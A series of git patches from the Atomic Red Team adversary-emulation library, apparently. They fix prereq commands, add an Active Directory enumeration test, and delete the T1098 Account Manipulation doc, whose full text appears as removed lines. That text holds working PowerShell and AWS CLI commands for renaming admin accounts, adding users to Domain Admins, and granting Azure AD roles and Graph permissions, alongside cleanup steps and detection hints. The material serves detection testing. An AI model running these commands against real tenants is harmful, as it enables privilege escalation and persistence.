+##### Description: Python2 must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v python2 --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install python2
+```
+##### Description: Libc-bin must be installed
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v ldd --version)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo apt-get -y install libc-bin
+```
+
+
+
+
 <br/>

From 4e7a2ed599855de2ec0068704ac779d75efcc7a8 Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Wed, 9 Mar 2022 14:02:31 -0700
Subject: [PATCH 21/83] fix prereq for screenshot test (#1805)

---
 atomics/T1113/T1113.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml
index a40676e3..fd54b103 100644
--- a/atomics/T1113/T1113.yaml
+++ b/atomics/T1113/T1113.yaml
@@ -86,7 +86,7 @@ atomic_tests:
     prereq_command: |
       if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
     get_prereq_command: |
-      sudo apt-get -y install graphicsmagick-imagemagick-compat
+      sudo apt install graphicsmagick-imagemagick-compat
   executor:
     command: |
       import -window root #{output_file}

From 8aedc6cdd9280e1356977e06c89d5eea60d128d0 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 9 Mar 2022 21:03:01 +0000
Subject: [PATCH 22/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml | 2 +-
 atomics/T1113/T1113.md     | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 26376790..66dce2ee 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -10238,7 +10238,7 @@ collection:
           1; fi
 
 '
-        get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat
+        get_prereq_command: 'sudo apt install graphicsmagick-imagemagick-compat
 
 '
       executor:
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md
index 0e5258c7..30ec4679 100644
--- a/atomics/T1113/T1113.md
+++ b/atomics/T1113/T1113.md
@@ -186,7 +186,7 @@ if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```bash
-sudo apt-get -y install graphicsmagick-imagemagick-compat
+sudo apt install graphicsmagick-imagemagick-compat
 ```
 
 

From 8578fc33086df055d97adb81dc142c6700b3a4c4 Mon Sep 17 00:00:00 2001
From: WojciechLesicki <wojciech.lesicki@gmail.com>
Date: Fri, 11 Mar 2022 23:52:07 +0100
Subject: [PATCH 23/83] Correct description

---
 atomics/T1098/T1098.yaml | 15 +++++++++++++--
 1 file changed, 13 insertions(+), 2 deletions(-)

diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
index 2060dac5..d1bfd288 100644
--- a/atomics/T1098/T1098.yaml
+++ b/atomics/T1098/T1098.yaml
@@ -416,9 +416,20 @@ atomic_tests:
     name: powershell
     elevation_required: false
 
-- name: Azure - adding permission to application
+- name: AzureAD - adding permission to application
   description: |
-    The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor 
+    The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
+    You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.
+    The DirectoryRecommendations.Read.All permissions have been selected as the default
+
+    The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
+
+    Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
+    You can also take a look at the materials:
+    https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/
+    https://github.com/reprise99/Sentinel-Queries
+    https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766
+    https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb
   supported_platforms:
   - azure-ad
   input_arguments:

From 30af70bef9c438c53a9479fb353865c1de965d67 Mon Sep 17 00:00:00 2001
From: WojciechLesicki <wojciech.lesicki@gmail.com>
Date: Fri, 11 Mar 2022 23:52:07 +0100
Subject: [PATCH 24/83] Removing md file

---
 atomics/T1098/T1098.md | 648 -----------------------------------------
 1 file changed, 648 deletions(-)
 delete mode 100644 atomics/T1098/T1098.md

diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
deleted file mode 100644
index cc23378d..00000000
--- a/atomics/T1098/T1098.md
+++ /dev/null
@@ -1,648 +0,0 @@
-# T1098 - Account Manipulation
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098)
-<blockquote>Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate)
-
-- [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate)
-
-- [Atomic Test #3 - AWS - Create a group and add a user to that group](#atomic-test-3---aws---create-a-group-and-add-a-user-to-that-group)
-
-- [Atomic Test #4 - Azure - adding user to Azure AD role](#atomic-test-4---azure---adding-user-to-azure-ad-role)
-
-- [Atomic Test #5 - Azure - adding service principal to Azure AD role](#atomic-test-5---azure---adding-service-principal-to-azure-ad-role)
-
-- [Atomic Test #6 - Azure - adding user to Azure role in subscription](#atomic-test-6---azure---adding-user-to-azure-role-in-subscription)
-
-- [Atomic Test #7 - Azure - adding service principal to Azure role in subscription](#atomic-test-7---azure---adding-service-principal-to-azure-role-in-subscription)
-
-- [Atomic Test #8 - Azure - adding permission to application](#atomic-test-8---azure---adding-permission-to-application)
-
-
-<br/>
-
-## Atomic Test #1 - Admin Account Manipulate
-Manipulate Admin Account Name
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$x = Get-Random -Minimum 2 -Maximum 9999
-$y = Get-Random -Minimum 2 -Maximum 9999
-$z = Get-Random -Minimum 2 -Maximum 9999
-$w = Get-Random -Minimum 2 -Maximum 9999
-Write-Host HaHa_$x$y$z
-
-$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name
-
-foreach($member in $fmm) {
-    if($member -like "*Administrator*") {
-        $account = $member.Name -replace ".+\\\","" # strip computername\
-        $originalDescription = (Get-LocalUser -Name $account).Description
-        Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description
-        Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation
-        Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME
-        }
-    }
-```
-
-#### Cleanup Commands:
-```powershell
-$list = Get-LocalUser |?{$_.Description -like "atr:*"}
-foreach($u in $list) {
-  $u.Description -match "atr:(?<Name>[^;]+);(?<Description>.*)"
-  Set-LocalUser -Name $u.Name -Description $Matches.Description
-  Rename-LocalUser -Name $u.Name -NewName $Matches.Name
-  Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME
-}
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Domain Account and Group Manipulate
-Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). 
-
-The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
-you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to 
-create the user and alter the group. Automatic installation of the dependency requires an elevated session, 
-and is unlikely to work with Powershell Core (untested).
-
-If you consider running this test against a production Active Directory, the good practise is to create a dedicated
-service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated
-as group manager of the target group.
-
-Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on
-a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-|
-| group | Name of the group to alter | String | Domain Admins|
-| create_args | Additional string appended to New-ADUser call | String | |
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$x = Get-Random -Minimum 2 -Maximum 99
-$y = Get-Random -Minimum 2 -Maximum 99
-$z = Get-Random -Minimum 2 -Maximum 99
-$w = Get-Random -Minimum 2 -Maximum 99
-
-Import-Module ActiveDirectory
-$account = "#{account_prefix}-$x$y$z"
-New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args}
-Add-ADGroupMember "#{group}" $account
-```
-
-#### Cleanup Commands:
-```powershell
-Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: PS Module ActiveDirectory
-##### Check Prereq Commands:
-```powershell
-Try {
-    Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
-    exit 0
-} 
-Catch {
-    exit 1
-}
-```
-##### Get Prereq Commands:
-```powershell
-if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
-  Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
-} else {
-  Install-WindowsFeature RSAT-AD-PowerShell
-}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - AWS - Create a group and add a user to that group
-Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss
-
-**Supported Platforms:** Iaas:aws
-
-
-**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f110a31122
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| username | Name of the AWS group to create | String | atomicredteam|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-aws iam create-group --group-name #{username}
-aws iam add-user-to-group --user-name #{username} --group-name #{username}
-```
-
-#### Cleanup Commands:
-```sh
-aws iam remove-user-from-group --user-name #{username} --group-name #{username}
-aws iam delete-group --group-name #{username}
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if the user exists, we can only add a user to a group if the user exists.
-##### Check Prereq Commands:
-```sh
-aws iam list-users | grep #{username}
-```
-##### Get Prereq Commands:
-```sh
-echo Please run atomic test T1136.003, before running this atomic test
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Azure - adding user to Azure AD role
-The adversarie want to add user to some Azure AD role. Threat actor 
-may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
-Privileged authentication administrator (this role can reset Global Administrator password!).
-By default, the role Global Reader is assigned to service principal in this test.
-
-The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
-
-Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type.
-
-**Supported Platforms:** Azure-ad
-
-
-**auto_generated_guid:** 0e65ae27-5385-46b4-98ac-607a8ee82261
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| username | Azure AD username | String | jonh@contoso.com|
-| password | Azure AD password | String | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | String | SuperUser|
-| role_name | Name of the targed Azure AD role | String | Global Reader|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Import-Module -Name AzureAD
-$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-Connect-AzureAD -Credential $Credential
-
-$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
-if ($user -eq $null) { Write-Warning "User not found"; exit }
-$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
-if ($role -eq $null) { Write-Warning "Role not found"; exit }
-Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
-Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
-```
-
-#### Cleanup Commands:
-```powershell
-Import-Module -Name AzureAD -ErrorAction Ignore
-$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-Connect-AzureAD -Credential $Credential -ErrorAction Ignore
-
-$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
-if ($user -eq $null) { Write-Warning "User not found"; exit }
-$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
-if ($role -eq $null) { Write-Warning "Role not found"; exit }
-
-Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
-Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: AzureAD module must be installed.
-##### Check Prereq Commands:
-```powershell
-try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Install-Module -Name AzureAD -Force
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Azure - adding service principal to Azure AD role
-The adversarie want to add service principal to some Azure AD role. Threat actor 
-may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
-Privileged authentication administrator (this role can reset Global Administrator password!).
-By default, the role Global Reader is assigned to service principal in this test.
-
-The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
-
-Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.
-
-**Supported Platforms:** Azure-ad
-
-
-**auto_generated_guid:** 92c40b3f-c406-4d1f-8d2b-c039bf5009e4
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| username | Azure AD username | String | jonh@contoso.com|
-| password | Azure AD password | String | p4sswd|
-| service_principal_name | Name of the service principal | String | SuperSP|
-| role_name | Name of the targed Azure AD role | String | Global Reader|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Import-Module -Name AzureAD
-$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-Connect-AzureAD -Credential $Credential
-
-$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
-if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
-$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
-if ($role -eq $null) { Write-Warning "Role not found"; exit }
-Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
-Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
-```
-
-#### Cleanup Commands:
-```powershell
-Import-Module -Name AzureAD -ErrorAction Ignore
-$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-Connect-AzureAD -Credential $Credential -ErrorAction Ignore
-
-$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
-if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
-$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
-if ($role -eq $null) { Write-Warning "Role not found"; exit }
-
-Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId
-Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: AzureAD module must be installed.
-##### Check Prereq Commands:
-```powershell
-try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Install-Module -Name AzureAD -Force
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Azure - adding user to Azure role in subscription
-The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor 
-may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
-By default, the role Reader is assigned to user in this test.
-
-New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
-
-The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
-(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
-and Microsoft Graph Directory.Read.All permissions.
-
-Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
-
-**Supported Platforms:** Iaas:azure
-
-
-**auto_generated_guid:** 1a94b3fc-b080-450a-b3d8-6d9b57b472ea
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| username | Azure AD username | String | jonh@contoso.com|
-| password | Azure AD password | String | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | String | SuperUser|
-| role_name | Name of the targed Azure role | String | Reader|
-| subscription | Name of the targed subscription | String | Azure subscription 1|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Import-Module -Name Az.Resources
-$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-Connect-AzAccount -Credential $Credential
-
-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
-if ($user -eq $null) { Write-Warning "User not found"; exit }
-$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
-if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
-$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
-if ($role -eq $null) { Write-Warning "Role not found"; exit }
-
-New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
-Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
-```
-
-#### Cleanup Commands:
-```powershell
-Import-Module -Name AzureAD -ErrorAction Ignore
-$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-Connect-AzAccount -Credential $Credential -ErrorAction Ignore
-
-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
-if ($user -eq $null) { Write-Warning "User not found"; exit }
-$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
-if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
-$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
-if ($role -eq $null) { Write-Warning "Role not found"; exit }
-
-Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
-Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Az.Resources module must be installed.
-##### Check Prereq Commands:
-```powershell
-try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Install-Module -Name Az.Resources -Force
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Azure - adding service principal to Azure role in subscription
-The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor 
-may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
-By default, the role Reader is assigned to service principal in this test.
-
-New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
-
-The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
-(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
-and Microsoft Graph Directory.Read.All permissions.
-
-Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
-
-**Supported Platforms:** Iaas:azure
-
-
-**auto_generated_guid:** c8f4bc29-a151-48da-b3be-4680af56f404
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| username | Azure AD username | String | jonh@contoso.com|
-| password | Azure AD password | String | p4sswd|
-| service_principal_name | Name of the service principal | String | SuperSP|
-| role_name | Name of the targed Azure role | String | Reader|
-| subscription | Name of the targed subscription | String | Azure subscription 1|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Import-Module -Name Az.Resources
-$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-Connect-AzAccount -Credential $Credential
-
-$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
-if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
-$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
-if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
-$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
-if ($role -eq $null) { Write-Warning "Role not found"; exit }
-
-New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
-Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
-```
-
-#### Cleanup Commands:
-```powershell
-Import-Module -Name AzureAD -ErrorAction Ignore
-$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-Connect-AzAccount -Credential $Credential -ErrorAction Ignore
-
-$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
-if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
-$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
-if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
-$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
-if ($role -eq $null) { Write-Warning "Role not found"; exit }
-
-Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
-Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Az.Resources module must be installed.
-##### Check Prereq Commands:
-```powershell
-try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Install-Module -Name Az.Resources -Force
-```
-
-
-
-
-<br/>
-
-## Atomic Test #8 - Azure - adding permission to application
-The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor.
-You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application.
-The DirectoryRecommendations.Read.All permissions have been selected as the default
-
-The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD.
-
-Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs.
-You can also take a look at the materials:</br>
-https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/</br>
-https://github.com/reprise99/Sentinel-Queries</br>
-https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766</br>
-https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb</br>
-
-**Supported Platforms:** Azure-ad
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| username | Azure AD username | String | jonh@contoso.com|
-| password | Azure AD password | String | p4sswd|
-| application_name | Name of the targeted application | String | test_app|
-| application_permission | Permission from Microsoft Graph Resource API that will be add to application from  | String | DirectoryRecommendations.Read.All|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-```powershell
-Import-Module -Name AzureAD
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzureAD -Credential $Credential
-
-      $aadApplication = New-AzureADApplication -DisplayName "#{application_name}"
-      $servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId
-      #$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
-
-      #Get Service Principal of Microsoft Graph Resource API 
-      $graphSP =  Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"}
-
-      #Initialize RequiredResourceAccess for Microsoft Graph Resource API 
-      $requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess
-      $requiredGraphAccess.ResourceAppId = $graphSP.AppId
-      $requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]
-
-      #Set Application Permissions
-      $ApplicationPermissions = @('#{application_permission}')
-
-      $reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}
-      if($reqPermission)
-      {
-      $resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess
-      $resourceAccess.Type = "Role"
-      $resourceAccess.Id = $reqPermission.Id    
-      #Add required app permission
-      $requiredGraphAccess.ResourceAccess.Add($resourceAccess)
-      }
-      else
-      {
-      Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red
-      }
-
-      #Add required resource accesses
-      $requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]
-      $requiredResourcesAccess.Add($requiredGraphAccess)
-
-      #Set permissions in existing Azure AD App
-      Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess
-
-      $servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}
-
-      New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id
-```
-
-#### Cleanup Commands:
-```powershell
-Import-Module -Name AzureAD
-      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
-      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
-      Connect-AzureAD -Credential $Credential
-
-      $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
-      Remove-AzureADApplication -ObjectId $aadApplication.ObjectId
-```
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: AzureAD module must be installed.
-##### Check Prereq Commands:
-```powershell
-try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-Install-Module -Name AzureAD -Force
-```
-
-<br/>
-<br/>

From d1e3e11730fe84222f92b1a488b3876d4ca6a566 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Mon, 14 Mar 2022 10:43:19 -0600
Subject: [PATCH 25/83] AD Searching and powerview  (#1806)

* ADSI

* new atomics
---
 atomics/T1018/T1018.yaml         | 12 ++++++++
 atomics/T1069.002/T1069.002.yaml | 47 ++++++++++++++++++++++++++++++++
 atomics/T1087.002/T1087.002.yaml | 12 ++++++++
 atomics/T1558.004/T1558.004.yaml | 10 +++++++
 4 files changed, 81 insertions(+)

diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index 9dd11702..4f67a880 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -310,3 +310,15 @@ atomic_tests:
         Write-Host $Computer}
     name: powershell
     elevation_required: false
+- name: Enumerate Active Directory Computers with ADSISearcher
+  description: |
+    The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
+    Upon successful execution a listing of computers will output with their paths in AD.
+    Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
\ No newline at end of file
